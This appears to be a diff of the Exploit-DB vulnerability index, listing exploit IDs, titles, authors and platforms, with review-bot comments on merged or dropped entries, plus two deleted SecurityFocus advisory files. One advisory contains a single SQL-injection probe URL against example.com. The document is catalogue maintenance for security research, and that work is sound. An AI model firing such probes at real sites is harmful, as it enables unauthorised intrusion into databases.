15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow 0day",2010-12-12,m_101,windows,local,0
@ -13778,7 +13771,7 @@ id,file,description,date,author,platform,type,port
15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Include",2011-01-05,n0n0x,php,webapps,0
15913,platforms/php/webapps/15913.pl,"PhpGedView <= 4.2.3 - Local File Inclusion Vulnerability",2011-01-05,dun,php,webapps,0
15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
15916,platforms/linux/local/15916.c,"Linux Kernel CAP_SYS_ADMIN to root Exploit",2011-01-05,"Dan Rosenberg",linux,local,0
15916,platforms/linux/local/15916.c,"Linux Kernel 2.6.34+ - CAP_SYS_ADMIN x86 Local Privilege Escalation Exploit",2011-01-05,"Dan Rosenberg",linux,local,0
15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0
15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0
15919,platforms/windows/local/15919.pl,"Enzip 3.00 Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0
@ -13798,7 +13791,7 @@ id,file,description,date,author,platform,type,port
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)",2011-01-08,"Joe Sylve",linux,local,0
15944,platforms/linux/local/15944.c,"Linux Kernel 2.6.34+ - CAP_SYS_ADMIN x86 & x64 Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0
@ -17261,7 +17254,7 @@ id,file,description,date,author,platform,type,port
19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0
19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow",2012-07-19,metasploit,windows,remote,998
19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow",2012-07-19,metasploit,windows,remote,998
19933,platforms/linux/local/19933.rb,"Linux Kernel Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0
19933,platforms/linux/local/19933.rb,"Linux Kernel - Sendpage Local Privilege Escalation",2012-07-19,metasploit,linux,local,0
19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0
19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0
19939,platforms/windows/remote/19939.html,"Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0
@ -19163,9 +19156,7 @@ id,file,description,date,author,platform,type,port
21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure Vulnerability",2002-10-07,frog,php,webapps,0
21913,platforms/windows/remote/21913.txt,"Citrix Published Applications Information Disclosure Vulnerability",2002-10-07,wire,windows,remote,0
21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0
21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21916,platforms/windows/dos/21916.txt,"Kaspersky Labs Anti-Hacker 1.0 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21917,platforms/windows/dos/21917.txt,"BlackIce Server Protection 3.5/BlackICE Defender 2.9 Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0
21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection Vulnerability",2002-10-08,hish,php,webapps,0
21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse Vulnerability",2002-10-08,netmask,unix,remote,0
21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0
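Review bot: three rows (21915, 21916, 21917, all by Yiming Gong on 2002-10-08) are collapsed into a single 21915 row whose title concatenates the three products. That leaves IDs 21916 and 21917, which had their own files (platforms/windows/dos/21916.txt and 21917.txt), with no index entry, and the merged title carries a stray space in "Firewall 2002/ Kaspersky" and mixes "BlackIce" with "BlackICE". Either keep three rows sharing the " - Auto Block DoS Weakness" suffix, or, if one file now covers all three, remove the other two files and note the merge in the commit message.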
@ -21150,22 +21141,19 @@ id,file,description,date,author,platform,type,port
23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 tiki-usermenu.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 tiki-list_file_gallery.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23967,platforms/php/webapps/23967.txt,"E SMS Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0
23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS Vulnerability",2013-01-08,"SecPod Research",asp,webapps,0
23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow Vulnerability",2013-01-08,metasploit,windows,remote,0
23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0
23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 tiki-index.php comments_offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 tiki-user_tasks.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0
23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23974,platforms/php/webapps/23974.txt,"TikiWiki Project 1.8 tiki-file_galleries.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23975,platforms/php/webapps/23975.txt,"TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23976,platforms/php/webapps/23976.txt,"TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23977,platforms/php/webapps/23977.txt,"TikiWiki Project 1.8 tiki-list_blogs.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23978,platforms/php/webapps/23978.txt,"TikiWiki Project 1.8 tiki-usermenu.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23979,platforms/php/webapps/23979.txt,"TikiWiki Project 1.8 tiki-browse_categories.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23980,platforms/php/webapps/23980.txt,"TikiWiki Project 1.8 tiki-index.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23981,platforms/php/webapps/23981.txt,"TikiWiki Project 1.8 tiki-user_tasks.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23982,platforms/php/webapps/23982.txt,"TikiWiki Project 1.8 tiki-list_faqs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23983,platforms/php/webapps/23983.txt,"TikiWiki Project 1.8 tiki-list_trackers.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
23984,platforms/php/webapps/23984.txt,"TikiWiki Project 1.8 tiki-list_blogs.php offset Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0
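Review bot: the " - " separator is applied to only three of the TikiWiki Project 1.8 entries in this hunk (23966, 23971, 23972) while 23963-23965 and 23973-23984 keep the unseparated form; if the intent is to normalise descriptions, apply it to the whole block. The header shrinks the hunk from 22 to 19 lines, but with the +/- markers lost in this rendering it is not visible which entries are dropped; 23980 (tiki-index.php offset) and 23981 (tiki-user_tasks.php offset) are the obvious candidates now that their parameters are folded into the new 23971 and 23972 descriptions, so the commit message should say so. Minor: the author field of 23967 carries a trailing space ("cr4wl3r ").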
@ -22423,7 +22411,6 @@ id,file,description,date,author,platform,type,port
25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client Env_opt_add Heap-Based Buffer Overflow Vulnerability",2005-03-28,"Gael Delalleau",linux,dos,0
25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0
25307,platforms/linux/local/25307.c,"Linux Kernel open-time Capability file_ns_capable() - Privilege Escalation Vulnerability",2013-05-08,"Andrew Lutomirski",linux,local,0
25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 showgallery.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 showmembers.php Multiple Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 slideshow.php photo Parameter XSS",2005-03-28,"Diabolic Crab",php,webapps,0
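Review bot: this hunk drops 25307 (Andrew Lutomirski's file_ns_capable() entry of 2013-05-08), leaving 25450 as the only record of that bug. EDB ids are cited from advisories and CVE references, so a removed id should be recorded in the commit message together with the surviving id rather than silently disappearing; otherwise a lookup of 25307 returns nothing and gives no pointer to 25450.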
@ -22565,7 +22552,7 @@ id,file,description,date,author,platform,type,port
25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection Vulnerabilities",2013-05-14,RunRunLevel,php,webapps,0
25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,metasploit,windows,local,0
25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF Vulnerability",2013-05-14,"High-Tech Bridge SA",php,webapps,0
25450,platforms/linux/local/25450.c,"Linux Kernel open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
25450,platforms/linux/local/25450.c,"Linux Kernel 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x Knowledge Base Module KB.PHP SQL Injection Vulnerability",2005-04-13,deluxe@security-project.org,php,webapps,0
25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (1)",2007-02-23,bunker,multiple,remote,0
25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database SUBSCRIPTION_NAME Remote SQL Injection Vulnerability (2)",2007-02-26,bunker,multiple,remote,0
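Review bot: 25450 now pins "Linux Kernel 3.8.x", which helps anyone triaging which kernels need the file_ns_capable() fix, but the value has to match the header of 25450.c, which this diff does not show. The sibling entry 26131 in the next hunk uses the "< 3.8.9" form; pick one convention for version ranges so that a search on the kernel version finds both.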
@ -23231,7 +23218,7 @@ id,file,description,date,author,platform,type,port
26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service Vulnerability",2005-08-09,"Patrick Webster",osx,dos,0
26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF Vulnerability",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 perf_swevent_init - Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 - x86_64 perf_swevent_init Local root Exploit",2013-06-11,"Andrea Bittau",linux,local,0
26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0
@ -24494,7 +24481,6 @@ id,file,description,date,author,platform,type,port
27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0
27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0
27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,dos,0
27426,platforms/linux/local/27426.txt,"Zoo 2.10 Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,local,0
27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0
27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0
27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,metasploit,windows,remote,0
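Review bot: 27426 (Zoo 2.10, type local) is dropped and 27425 (type dos) kept, although both came from the same advisory. The advisory text describes arbitrary code execution in the context of the user running zoo "to potentially gain elevated privileges", which is exactly what the "local" type is for; consider keeping the local classification (or re-typing 27425) so the entry is not filed as a plain crash.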
@ -24774,9 +24760,8 @@ id,file,description,date,author,platform,type,port
27717,platforms/php/webapps/27717.txt,"phpldapadmin 0.9.8 compare_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27718,platforms/php/webapps/27718.txt,"phpldapadmin 0.9.8 copy_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27719,platforms/php/webapps/27719.txt,"phpldapadmin 0.9.8 rename_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27720,platforms/php/webapps/27720.txt,"phpldapadmin 0.9.8 delete_form.php dn Parameter XSS",2006-04-21,r0t,php,webapps,0
27721,platforms/php/webapps/27721.txt,"phpldapadmin 0.9.8 search.php scope Parameter XSS",2006-04-21,r0t,php,webapps,0
27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0
27722,platforms/php/webapps/27722.txt,"phpldapadmin 0.9.8 - template_engine.php Multiple Parameter XSS",2006-04-21,r0t,php,webapps,0
27723,platforms/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x XMLRPC Server Denial of Service Vulnerability",2006-04-21,"Tanaka Akira",linux,dos,0
27724,platforms/php/webapps/27724.txt,"Scry Gallery Directory Traversal Vulnerability",2006-04-21,"Morocco Security Team",php,webapps,0
27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0
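Review bot: the header shows one line removed (9 to 8) but only the 27722 rename is visible as a change, so either 27720 (delete_form.php) or 27721 (search.php) is being dropped; neither duplicates another visible entry, since each names a different script, so spell out in the commit message which one goes and why. The separator is again added to 27722 only, leaving 27717-27721 in the old form.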
@ -24898,8 +24883,7 @@ id,file,description,date,author,platform,type,port
27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 Showthread.PHP SQL Injection Vulnerability",2006-05-09,Breeeeh,php,webapps,0
27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 Moreinfo.ASP Cross-Site Scripting Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0
27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.PHP Remote File Include Vulnerability",2006-05-09,ReZEN,php,webapps,0
27846,platforms/asp/webapps/27846.txt,"EImagePro 0 subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27847,platforms/asp/webapps/27847.txt,"EImagePro 0 imageList.asp SubjectID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27846,platforms/asp/webapps/27846.txt,"EImagePro 0 - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
27848,platforms/php/webapps/27848.txt,"EImagePro 0 view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0
27849,platforms/asp/webapps/27849.txt,"EDirectoryPro Search_result.ASP SQL Injection Vulnerability",2006-05-09,Dj_Eyes,asp,webapps,0
27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library Heap Corruption Vulnerability",2006-05-09,"Ruben Santamarta ",windows,dos,0
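Review bot: 27847 (imageList.asp SubjectID) is removed and 27846 (subList.asp CatID) renamed; these are different scripts and parameters from the same advisory, so make sure the surviving file still lists both cases. Separately, the context line 27848 (view.asp Pic) sits under platforms/php/ with platform "php" although it is the same ASP application as 27846/27847 (platform "asp"); move it to platforms/asp/ while this block is being touched.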
@ -25322,7 +25306,6 @@ id,file,description,date,author,platform,type,port
28282,platforms/php/webapps/28282.txt,"phpbb-auction 1.x auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0
28283,platforms/hardware/webapps/28283.txt,"Zyxel Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,hardware,webapps,0
28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0
28285,platforms/php/webapps/28285.txt,"Zyxel Prestige 660H-61 ADSL Router RPSysAdmin.HTML Cross-Site Scripting Vulnerability",2006-07-27,jose.palanco,php,webapps,0
28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 NDFXArtEffects Stack Overflow Vulnerability",2006-07-27,hdm,windows,dos,0
28287,platforms/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x Insecure Default Permissions on Shared Memory Vulnerability",2006-07-27,anonymous,linux,local,0
28288,platforms/linux/local/28288.c,"MidiRecord2 MidiRecord.CC Local Buffer Overflow Vulnerability",2006-07-27,"Dedi Dwianto",linux,local,0
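Review bot: dropping 28285 is right: it was the copy of the Zyxel Prestige 660H-61 advisory mis-filed under platforms/php/ with platform "php" for a router, and 28283 under hardware/webapps is the correct home. Record 28285 -> 28283 in the commit message for anyone holding the old id.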
@ -26982,8 +26965,7 @@ id,file,description,date,author,platform,type,port
30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email FormMail.PHP Input Validation Vulnerability",2007-05-15,"Jesper Jurcenoks",php,webapps,0
30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - view/search/ path Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0
30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter XSS",2007-05-15,"Mikhail Markin",php,webapps,0
30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Embedded ICC Profile Image Parser Overflow",2007-05-16,"Chris Evans",linux,remote,0
30044,platforms/linux/dos/30044.txt,"Sun Java JDK 1.x - BMP Parsing Remote Privilege Escalation",2007-05-16,"Chris Evans",linux,dos,0
30043,platforms/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote,0
30045,platforms/windows/remote/30045.html,"PrecisionID Barcode PrecisionID_Barcode.DLL ActiveX 1.9 Control Arbitrary File Overwrite Vulnerability",2007-05-16,shinnai,windows,remote,0
30046,platforms/windows/dos/30046.py,"Computer Associates BrightStor ARCserve Backup <= 11.5 mediasvr caloggerd Denial of Service Vulnerabilities",2007-05-16,"M. Shirk",windows,dos,0
30047,platforms/php/webapps/30047.txt,"VBulletin <= 3.6.6 Calendar.PHP HTML Injection Vulnerability",2007-05-16,"laurent gaffie",php,webapps,0
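Review bot: collapsing 30043 (embedded ICC profile image parser overflow) and 30044 (BMP parsing) into "Sun Java JDK 1.x - Multiple Vulnerabilities" throws away the only searchable component names; "Multiple Vulnerabilities" matches nothing when someone triages by parser. Suggest keeping them, e.g. "Sun Java JDK 1.x - ICC Profile / BMP Parsing Multiple Vulnerabilities". Also check the type column: 30044 was "dos" and 30043 is "remote", so the merged entry now claims remote for the BMP issue as well.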
@ -27181,11 +27163,10 @@ id,file,description,date,author,platform,type,port
30269,platforms/jsp/webapps/30269.txt,"NetFlow Analyzer 5 /jspui/selectDevice.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
30270,platforms/jsp/webapps/30270.txt,"NetFlow Analyzer 5 /jspui/customReport.jsp rtype Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0
30271,platforms/java/webapps/30271.txt,"OpManager 6/7 ping.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30272,platforms/java/webapps/30272.txt,"OpManager 6/7 traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30276,platforms/java/webapps/30276.txt,"OpManager 6/7 map/traceRoute.do name Parameter XSS",2007-07-04,Lostmon,java,webapps,0
30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0
30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0
30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAMS Cross Site Scripting Vulnerability",2007-07-05,"Mark Litchfield",multiple,remote,0
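Review bot: 30272 (traceRoute.do) is renamed while 30276 (map/traceRoute.do) is the line that disappears (11 to 10); the two entries name different request paths, and nothing in this hunk establishes that map/traceRoute.do is served by the same handler. If they are being merged, keep the map/ path in 30272's description so the second endpoint remains findable; if not, state why 30276 is a duplicate.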
@ -29042,10 +29023,9 @@ id,file,description,date,author,platform,type,port
32257,platforms/php/webapps/32257.txt,"PromoProducts 'view_product.php' Multiple SQL Injection Vulnerabilities",2008-08-15,baltazar,php,webapps,0
32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 'awstats.pl' Cross-Site Scripting Vulnerability",2008-08-18,"Morgan Todd",cgi,webapps,0
32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32260,platforms/php/webapps/32260.txt,"Freeway 1.4.1.171 french/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0
32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php, mac param) - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80
32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 templates/Freeway/boxes/card1.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
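Review bot: one Freeway 1.4.1.171 line is dropped here (10 to 9), most likely 32260 (french/account.php), the localisation twin of 32259 (english/account.php), while 32264 (french/account_newsletters.php) stays because it has no English twin. That is a reasonable dedup rule, but it should be stated in the commit message, and the separator added to 32264 then belongs on 32259 and 32265-32267 as well.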
@ -30107,3 +30087,8 @@ id,file,description,date,author,platform,type,port
33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0
33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0
33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross Site Scripting Vulnerability",2009-12-10,bi0,php,webapps,0
33397,platforms/linux/dos/33397.txt,"MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0
33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0
33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0
33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0
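Review bot: 33397 and 33398 both come from the same MySQL advisory (bid/37297, per the added files) and differ only in the crash trigger named in the description, so keep those triggers in the description as the one thing telling the two ids apart. Both are filed as platform "linux", though a server-side SQL-expression DoS is not Linux-specific; other server products in this file (e.g. 25452/25453 Oracle) use "multiple". Also, 33395 is skipped between 33394 and 33396; fine if reserved, but worth a mention.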


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17911/info
EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
http://www.example.com/imagegallery/subList.asp?CatID=&#039;
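Review bot: the PoC line of this deleted file targets subList.asp?CatID=, i.e. the case kept as 27846, not the imageList.asp SubjectID case that 27847 described; if this is 27847.txt, its content was a copy of 27846.txt and the imageList.asp variant is documented nowhere after this commit. Confirm that 27846.txt names both scripts, or keep the 27847 entry.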


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/24767/info
OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
